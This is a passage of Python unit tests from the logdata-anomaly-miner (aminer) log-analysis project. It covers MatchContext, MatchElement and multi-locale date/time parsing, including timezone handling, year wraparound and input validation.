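            'c.brat[0]': 'worst', 'c.brat[1]': 'wuast', 'c.brat[2].key[0]': 'wurst', 'c.brat[2].key[1]': 'fleisch',
            'c.brat[2].food': 'veggie', 'c.brat[3]': 'blues', 'c.bist': 'narrisch', 'foo': 'bar'}
        jao = JsonAccessObject(nested)
        self.assertEqual(len(expected), len(jao.collection))
        for flat_key, leaf_value in expected.items():
            self.assertTrue(jao.collection[flat_key])
            # c.bist was previously only checked for presence; its value is now compared like the others
            self.assertEqual(leaf_value, jao.collection[flat_key]["value"])


# ---- logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/MatchContextTest.py ----
import unittest
from aminer.parsing.MatchContext import MatchContext, DebugMatchContext
from unit.TestBase import TestBase


class MatchContextTest(TestBase):
    """Unittests for the MatchContext and DebugMatchContext."""

    def test1update_successful(self):
        """Update the MatchContext and DebugMatchContext with allowed values."""
        data = b"this is an example of a log line."
        # (this method continues in the next chunk)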
        # MatchContext.update() only strips len(match_string) bytes from the front; it does not
        # check that the data really starts with them (see also test4), so a list of four
        # single-byte items or a mismatching string still consumes the same number of bytes.
        plain_cases = [
            (b"this is an example", b" of a log line."),
            ([b"t", b"h", b"i", b"s"], b" is an example of a log line."),
            (b"some other text", b"ple of a log line."),
        ]
        for consumed, remaining in plain_cases:
            plain_context = MatchContext(data)
            plain_context.update(consumed)
            self.assertEqual(plain_context.match_data, remaining)

        # DebugMatchContext additionally records what happened; the first get_debug_info()
        # call reports the start of the update, later calls only what changed since.
        debug_context = DebugMatchContext(data)
        debug_context.update(b"this is an example ")
        self.assertEqual(debug_context.match_data, b"of a log line.")
        self.assertEqual(
            debug_context.get_debug_info(),
            'Starting match update on "this is an example of a log line."\n Removed: "this is an example ", remaining 14'
            ' bytes\n Shortest unmatched data: "of a log line."\n')
        self.assertEqual(debug_context.get_debug_info(), ' Shortest unmatched data: "of a log line."\n')
        debug_context.update(b"of")
        self.assertEqual(
            debug_context.get_debug_info(), ' Removed: "of", remaining 12 bytes\n Shortest unmatched data: " a log line."\n')
        debug_context.update(b" a log line.")
        self.assertEqual(
            debug_context.get_debug_info(), ' Removed: " a log line.", remaining 0 bytes\n Shortest unmatched data: ""\n')
        # Consuming past the end is rejected, and the rejection shows up in the debug info.
        self.assertRaises(ValueError, debug_context.update, b" a log line.")
        self.assertEqual(
            debug_context.get_debug_info(), ' Current data does not start with " a log line."\n Shortest unmatched data: ""\n')
        # An empty update on exhausted data is still accepted.
        debug_context.update(b"")

    def test2update_fail(self):
        """Update the DebugMatchContext with not allowed values."""
        debug_context = DebugMatchContext(b"this is an example of a log line.")
        # Wrong types are rejected with TypeError, a non-matching prefix with ValueError.
        for wrong_type in ("this is an example", [b"t", b"h", b"i", b"s"]):
            self.assertRaises(TypeError, debug_context.update, wrong_type)
        self.assertRaises(ValueError, debug_context.update, b"some other text")

    def test3_match_context_init_input_validation(self):
        """Check if input is validated for MatchContext.__init__()."""
        rejected = (None, "path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set())
        for value in rejected:
            with self.subTest(value=value):
                self.assertRaises(TypeError, MatchContext, value)

    def test4_match_context_update_input_validation(self):
        """Check if MatchContext.update() fails if len(match_string) does not work."""
        data = b"this is an example of a log line."
        plain_context = MatchContext(data)
        # None of these support len(), the last one being the context object itself.
        for value in (None, True, 123, 123.22, plain_context):
            with self.subTest(value=value):
                self.assertRaises(TypeError, plain_context.update, value)

    def test5_debug_match_context_init_input_validation(self):
        """Check if input is validated for DebugMatchContext.__init__()."""
        rejected = (None, "path", True, 123, 123.22, True, {"id": "path"}, ["path"], [], (), set())
        for value in rejected:
            with self.subTest(value=value):
                self.assertRaises(TypeError, DebugMatchContext, value)

    def test6_debug_match_context_update_input_validation(self):
        """Check if input is validated for DebugMatchContext.update()."""
        data = b"this is an example of a log line."
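        # This test is about the Debug variant; plain MatchContext.update() is covered by test4.
        # Expectation: DebugMatchContext rejects non-bytes input with TypeError, as test2 shows for str and list.
        match_context = DebugMatchContext(data)
        for value in (None, True, 123, 123.22):
            with self.subTest(value=value):
                self.assertRaises(TypeError, match_context.update, value)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/MatchElementTest.py000066400000000000000000000227601437606560100272160ustar00rootroot00000000000000import unittest
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase


class MatchElementTest(TestBase):
    """Unittests for the MatchElement."""

    path = "path"
    match_string = b"12.5"
    match_object = 12.5

    @staticmethod
    def _build_tree():
        # Build the root -> a1 -> a2 -> a3 / root -> b1 -> b2 -> b3 tree shared by test5, test6 and test7.
        a3 = MatchElement("a3", b"a3", b"a3", None)
        a2 = MatchElement("a2", b"a2", b"a2", [a3])
        a1 = MatchElement("a1", b"a1", b"a1", [a2])
        b3 = MatchElement("b3", b"b3", b"b3", None)
        b2 = MatchElement("b2", b"b2", b"b2", [b3])
        b1 = MatchElement("b1", b"b1", b"b1", [b2])
        return MatchElement("root", b"root", b"root", [a1, b1])

    def test1get_path(self):
        """Test if get_path returns the path passed to __init__()."""
        match_element = MatchElement(self.path, self.match_string, self.match_object, None)
        self.assertEqual(match_element.get_path(), self.path)

    def test2get_match_string(self):
        """Test if get_match_string returns the match_string passed to __init__()."""
        match_element = MatchElement(self.path, self.match_string, self.match_object, None)
        self.assertEqual(match_element.get_match_string(), self.match_string)

    def test3get_match_object(self):
        """Test if get_match_object returns the match_object passed to __init__()."""
        match_element = MatchElement(self.path, self.match_string, self.match_object, None)
        self.assertEqual(match_element.get_match_object(), self.match_object)

    def test4get_children(self):
        """Test if get_children returns None when no children were passed to __init__()."""
        match_element = MatchElement(self.path, self.match_string, self.match_object, None)
        self.assertEqual(match_element.get_children(), None)

    def test5annotate_match(self):
        """This test case checks if all possible annotations are created correctly."""
        root_element = self._build_tree()
        # No indent string: a flat, space separated listing.
        self.assertEqual(root_element.annotate_match(None), "root: root a1: a1 a2: a2 a3: a3 b1: b1 b2: b2 b3: b3")
        # Empty indent string: one element per line, nesting shown by leading spaces.
        self.assertEqual(
            root_element.annotate_match(""), "root: root\n a1: a1\n a2: a2\n a3: a3\n b1: b1\n b2: b2\n b3: b3")
        # Custom indent string: prefixed to every line.
        self.assertEqual(
            root_element.annotate_match("--"),
            "--root: root\n-- a1: a1\n-- a2: a2\n-- a3: a3\n-- b1: b1\n-- b2: b2\n-- b3: b3")

    def test6serialize_object(self):
        """This test case checks if all child objects are serialized correctly."""
        root_element = self._build_tree()

        def node(name, children):
            # Expected serialized form of one element of the tree built by _build_tree().
            return {"path": name, "match_object": name.encode(), "match_string": name.encode(), "children": children}

        expected = node("root", [
            node("a1", [node("a2", [node("a3", [])])]),
            node("b1", [node("b2", [node("b3", [])])])])
        self.assertEqual(root_element.serialize_object(), expected)

    def test7str(self):
        """Test the string representation of the MatchElements."""
        root_element = self._build_tree()
        self.assertEqual(str(root_element), "MatchElement: path = root, string = root, object = root, children = 2")
        leaf_element = MatchElement("match", b"string", 2, None)
        self.assertEqual(str(leaf_element), "MatchElement: path = match, string = string, object = 2, children = 0")

    def test8init_path_input_validation(self):
        """Check if path is validated in __init__(): only str is accepted."""
        rejected = (b"path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set())
        for value in rejected:
            with self.subTest(path=value):
                self.assertRaises(TypeError, MatchElement, value, self.match_string, self.match_object, None)

    def test9init_match_string_input_validation(self):
        """Check if match_string is validated in __init__(): only bytes is accepted."""
        rejected = ("path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set())
        for value in rejected:
            with self.subTest(match_string=value):
                self.assertRaises(TypeError, MatchElement, self.path, value, self.match_object, None)

    def test10init_match_object_input_validation(self):
        """Check that __init__() accepts a match_object of any type, including another MatchElement."""
        accepted = (
            b"", "path", True, 123, 123.22, {"id": "path"}, ["path"], [], (), set(),
            MatchElement(self.path, self.match_string, self.match_object, None))
        for value in accepted:
            with self.subTest(match_object=value):
                MatchElement(self.path, self.match_string, value, None)

    def test11init_children_input_validation(self):
        """Check if children is validated in __init__(): None or a non-empty list of MatchElements."""
        rejected_type = (b"path", "path", True, 123, 123.22, {"id": "path"}, (), set(), ["string"], [b"string"])
        for value in rejected_type:
            with self.subTest(children=value):
                self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, value)
        # An empty list has the right type but is rejected as a value.
        self.assertRaises(ValueError, MatchElement, self.path, self.match_string, self.match_object, [])

    def test12init_child_elements_with_no_path(self):
        """This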
test case checks, whether an exception is raised, when the path is None and children are passed.""" self.assertRaises(ValueError, MatchElement, None, self.match_string, self.match_object, [ MatchElement(self.path, self.match_string, self.match_object, None)]) def test13annotate_match_indent_str_input_validation(self): """Check if indent_str is validated in annotate_match().""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertRaises(TypeError, match_element.annotate_match, b" ") self.assertRaises(TypeError, match_element.annotate_match, [" ", "-"]) self.assertRaises(TypeError, match_element.annotate_match, 123.22) self.assertRaises(TypeError, match_element.annotate_match, {"id": "path"}) self.assertRaises(TypeError, match_element.annotate_match, ["path"]) self.assertRaises(TypeError, match_element.annotate_match, []) self.assertRaises(TypeError, match_element.annotate_match, ()) self.assertRaises(TypeError, match_element.annotate_match, set()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/MultiLocaleDateTimeModelElementTest.py000066400000000000000000001206301437606560100327650ustar00rootroot00000000000000import unittest import locale import pytz import logging from io import StringIO from pwd import getpwnam from grp import getgrnam from datetime import datetime, timezone from aminer.parsing.DateTimeModelElement import MultiLocaleDateTimeModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, initialize_loggers class MultiLocaleDateTimeModelElementTest(TestBase): """ Unittests for the MultiLocaleDateTimeModelElement. To calculate the expected timestamps the timezone shift was added or subtracted from the date and the epoch was calculated on https://www.epochconverter.com/. 
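    For example the date 24.03.2018 11:40:00 CET was converted to 24.03.2018 10:40:00 UTC and then the epoch in seconds was calculated (1521888000).
    """

    id_ = "dtme"
    path = "path"

    def test1get_match_element_with_different_date_formats(self):
        """Test if different date_formats can be used to match data."""
        tz_gmt10 = pytz.timezone("Etc/GMT+10")
        en_gb_utf8 = "en_GB.utf8"
        en_us_utf8 = "en_US.utf8"
        de_at_utf8 = "de_AT.utf8"
        # The position of a tuple in this list is the "formatN" suffix of the resulting match element path.
        multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [
            (b"%d.%m.%Y %H:%M:%S.%f", None, None),       # format0
            (b"%d.%m.%Y %H:%M:%S%z", None, None),        # format1
            (b"%d.%m.%Y %H:%M:%S", None, None),          # format2
            (b"%d.%m.%YT%H:%M:%S", None, None),          # format3
            (b"%d.%m.%Y", None, None),                   # format4
            (b"%H:%M:%S:%f", None, de_at_utf8),          # format5
            (b"%H:%M:%S", None, None),                   # format6
            (b"%b %d", tz_gmt10, de_at_utf8),            # format7
            (b"%d %b %Y", None, en_gb_utf8),             # format8
            (b"%dth %b %Y", None, en_gb_utf8),           # format9
            (b"%d/%m/%Y", None, en_gb_utf8),             # format10
            (b"%m-%d-%Y", None, en_us_utf8),             # format11
            (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)],  # format12
            start_year=2021)

        def _check(data, date, format_index, expected_timestamp):
            # Parse data and compare the match against the expected format index, date and timestamp.
            match_context = DummyMatchContext(data)
            match_element = multi_locale_dtme.get_match_element(self.path, match_context)
            self.compare_match_results(
                data, match_element, match_context, self.id_ + "/format" + str(format_index), self.path, date,
                expected_timestamp, None)

        # test normal date (matched by format1, the %z variant, rather than format2 — presumably
        # because a missing zone is tolerated there; this is the behaviour asserted by the original test)
        _check(b"07.02.2019 11:40:00: it still works", b"07.02.2019 11:40:00", 1, 1549539600)
        # test leap year date
        _check(b"29.02.2020 11:40:00: it still works", b"29.02.2020 11:40:00", 1, 1582976400)
        # test normal date with T
        _check(b"07.02.2019T11:40:00: it still works", b"07.02.2019T11:40:00", 3, 1549539600)
        # test normal date with fractions
        _check(b"07.02.2019 11:40:00.123456: it still works", b"07.02.2019 11:40:00.123456", 0, 1549539600.123456)
        # test normal date with z
        _check(b"07.02.2019 11:40:00+0000: it still works", b"07.02.2019 11:40:00+0000", 1, 1549539600)
        # test with only date defined
        _check(b"07.02.2019: it still works", b"07.02.2019", 4, 1549497600)

        # test with only time defined. Here obviously the seconds can not be tested, so the expected
        # timestamp is the parsed value itself: this only checks the format index, path and match string.
        data = b"11:40:23: it still works"
        date = b"11:40:23"
        match_context = DummyMatchContext(data)
        match_element = multi_locale_dtme.get_match_element(self.path, match_context)
        self.compare_match_results(
            data, match_element, match_context, self.id_ + "/format6", self.path, date, match_element.match_object, None)

        # month name with an explicit time zone; the year is taken from start_year
        dtm = datetime(2021, 2, 25, tzinfo=tz_gmt10)
        # total_seconds should be in UTC, so the timezones are parsed out.
        total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=tz_gmt10)).days * 86400 - dtm.utcoffset().total_seconds()
        _check(b"Feb 25 something happened", b"Feb 25", 7, total_seconds)

        # British date
        _check(b"13 Apr 2019 something happened", b"13 Apr 2019", 8, 1555113600)
        # British date 2
        _check(b"13th Apr 2019 something happened", b"13th Apr 2019", 9, 1555113600)
        # British date 3
        _check(b"13/04/2019 something happened", b"13/04/2019", 10, 1555113600)
        # US date
        _check(b"04-13-2019 something happened", b"04-13-2019", 11, 1555113600)

        # Austrian date no year - year should already be learnt.
        # start year has to be 2021, because all other formats have defined years.
        _check(b"13.04. 15:12:54:201 something happened", b"13.04. 15:12:54:201", 12, 1618326774.201)

        multi_locale_dtme.latest_parsed_timestamp = None
        # Austrian time no date: the parser fills in today's month and day.
        data = b"15:12:54:201 something happened"
        date = b"15:12:54:201"
        # Read the clock once so month and day cannot come from two different days around midnight.
        today = datetime.now()
        # ":201" parsed with %f is 201 milliseconds, i.e. 201000 microseconds.
        dtm = datetime(2021, today.month, today.day, 15, 12, 54, 201000, tzinfo=timezone.utc)
        # total_seconds should be in UTC, so the timezones are parsed out.
        delta = dtm - datetime(1970, 1, 1, tzinfo=dtm.tzinfo)
        total_seconds = delta.days * 86400 + delta.seconds + delta.microseconds / 1000000
        _check(data, date, 5, total_seconds)

    def test2wrong_date(self):
        """Test if wrong input data does not return a match."""
        tz_gmt10 = pytz.timezone("Etc/GMT+10")
        en_gb_utf8 = "en_GB.utf8"
        en_us_utf8 = "en_US.utf8"
        de_at_utf8 = "de_AT.utf8"
        multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [
            (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None),
            (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8),
            (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8),
            (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. 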
%H:%M:%S:%f", None, de_at_utf8)]) # wrong day data = b"32.03.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong month data = b"01.13.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong year data = b"01.01.00 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong date leap year data = b"29.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # British date data = b"13 Dezember 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_unclean_format_string(self): """This test case checks if unclean format_strings can be used.""" data = b"Date %d: 07.02.2018 11:40:00 UTC+0000: it still works" date = b"Date %d: 07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"Date %%d: %d.%m.%Y %H:%M:%S%z", None, None)]) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518003600, None) def test4get_match_element_with_different_time_zones(self): """Test if different time_zones work with the MultiLocaleDateTimeModelElement.""" multi_locale_dtme = 
MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S%z", None, None)]) data = b"07.02.2018 11:40:00 UTC-1200: it still works" date = b"07.02.2018 11:40:00 UTC-1200" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-12: it still works" date = b"07.02.2018 11:40:00 UTC-12" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-5: it still works" date = b"07.02.2018 11:40:00 UTC-5" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC-0500: it still works" date = b"07.02.2018 11:40:00 UTC-0500" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC+0000: it still works" date = b"07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518003600, None) data = b"07.02.2018 11:40:00 UTC+0100: it still works" date = b"07.02.2018 11:40:00 UTC+0100" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, 
match_context, self.id_ + "/format0", self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00 UTC+1400: it still works" date = b"07.02.2018 11:40:00 UTC+1400" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1517953200, None) def test5get_match_element_with_different_text_locales(self): """Test if data with different text locales can be handled with different text_locale parameters.""" MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "de_AT.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "de_AT.ISO-8859-1")]) def test6text_locale_not_installed(self): """Check if an exception is raised when the text_locale is not installed on the system.""" self.assertRaises(locale.Error, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "af-ZA.UTF-8")]) def test7get_match_element_with_start_year(self): """Test if dates without year can be parsed, when the start_year is defined.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2017) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1486467600, None) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2019) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 
1549539600, None) def test8get_match_element_without_start_year_defined(self): """Test if dates without year can still be parsed, even without defining the start_year.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)]) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 2, 7, 11, 40, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) def test9get_match_element_with_leap_start_year(self): """Check if leap start_years can parse the 29th February.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2020) data = b"29.02 11:40:00: it still works" date = b"29.02 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1582976400, None) def test10get_match_element_without_leap_start_year(self): """Check if normal start_years can not parse the 29th February.""" data = b"29.02 11:40:00: it still works" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2019) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11learn_new_start_year_with_start_year_set(self): """Test if a new year is learned successfully with the start year being set.""" start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], 
start_year=start_year) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, start_year) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609500000, None) self.assertEqual(multi_locale_dtme.start_year, start_year + 1) def test12learn_new_start_year_without_start_year_set(self): """Test if a new year is learned successfully with the start year being None.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)]) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 12, 31, 23, 59, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) start_year = multi_locale_dtme.start_year data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year+1, 1, 1, 11, 20, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) 
self.assertEqual(multi_locale_dtme.start_year, start_year + 1) def test13max_time_jump_seconds_in_time(self): """ Test if the max_time_jump_seconds parameter works if the next date is in time. Warnings with unqualified timestamp year wraparound. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, 2020) data = b"01.01 23:59:00: it still works" date = b"01.01 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609545540, None) self.assertEqual(multi_locale_dtme.start_year, 2021) self.assertIn("WARNING:DEBUG:DateTimeModelElement unqualified timestamp year wraparound detected from 2021-01-01T23:59:00+00:00 to " "2021-01-01T23:59:00+00:00", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test14max_time_jump_seconds_exceeded(self): """ Test if the start_year is not updated, when the next date exceeds the max_time_jump_seconds. A time inconsistency warning must occur. 
""" log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, start_year) data = b"01.01 23:59:01: it still works" date = b"01.01 23:59:01" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1577923141, None) self.assertEqual(multi_locale_dtme.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. 
Check your settings!", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test15time_change_cest_cet(self): """Check if the time change from CET to CEST and vice versa work as expected.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S%z", None, None)]) data = b"24.03.2018 11:40:00 CET: it still works" date = b"24.03.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1521888000, None) data = b"25.03.2018 11:40:00 CEST: it still works" date = b"25.03.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1521970800, None) data = b"27.10.2018 11:40:00 CEST: it still works" date = b"27.10.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540633200, None) data = b"28.10.2018 11:40:00 CET: it still works" date = b"28.10.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540723200, None) data = b"27.10.2018 11:40:00 EST: it still works" date = b"27.10.2018 11:40:00 EST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, 
def test16same_timestamp_multiple_times(self):
    """
    Parse the identical timestamp twice in a row.

    Both runs must produce the same match for "07.02.2019 11:40:00" with the epoch value 1549539600
    (2019-02-07T11:40:00Z); a repeated, equal timestamp is not a time jump.
    """
    multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)])
    data = b"07.02.2019 11:40:00: it still works"
    date = b"07.02.2019 11:40:00"
    expected_epoch = 1549539600
    for _ in range(2):
        match_context = DummyMatchContext(data)
        match_element = multi_locale_dtme.get_match_element(self.path, match_context)
        self.compare_match_results(
            data, match_element, match_context, self.id_ + "/format0", self.path, date, expected_epoch, None)
def test19date_formats_input_validation(self):
    """
    Check the validation of the date_formats argument.

    Every specifier of the allow-list (%b %d %f %H %M %m %S %s %Y %z %%) is accepted on its own. Combining all of
    them must raise ValueError (two month representations, and %s next to non-second specifiers); specifiers
    outside the allow-list, specifiers repeated more than once (except %% and %z), empty formats, non-bytes
    formats and tuples of the wrong length must be rejected as asserted below.
    """
    allowed_format_specifiers = b"bdfHMmSsYz%"
    # Each allowed specifier on its own must be accepted; collect them into one combined format on the way.
    combined = b""
    for spec in (bytes([c]) for c in allowed_format_specifiers):
        combined += b"%" + spec
        MultiLocaleDateTimeModelElement(self.id_, [(b"%" + spec, None, None)])
    # All specifiers together are invalid: %b and %m both represent the month, and %s may only be
    # combined with %z and %f.
    self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(combined, None, None)])
    MultiLocaleDateTimeModelElement(self.id_, [(combined.replace(b"%m", b"").replace(b"%s", b""), None, None)])
    MultiLocaleDateTimeModelElement(self.id_, [(combined.replace(b"%b", b"").replace(b"%s", b""), None, None)])
    MultiLocaleDateTimeModelElement(self.id_, [(b"%s%z%f", None, None)])
    for c in allowed_format_specifiers.replace(b"s", b"").replace(b"z", b"").replace(b"f", b"").replace(b"%", b""):
        self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%s%" + bytes([c]), None, None)])
    # Specifiers outside the allow-list must be rejected.
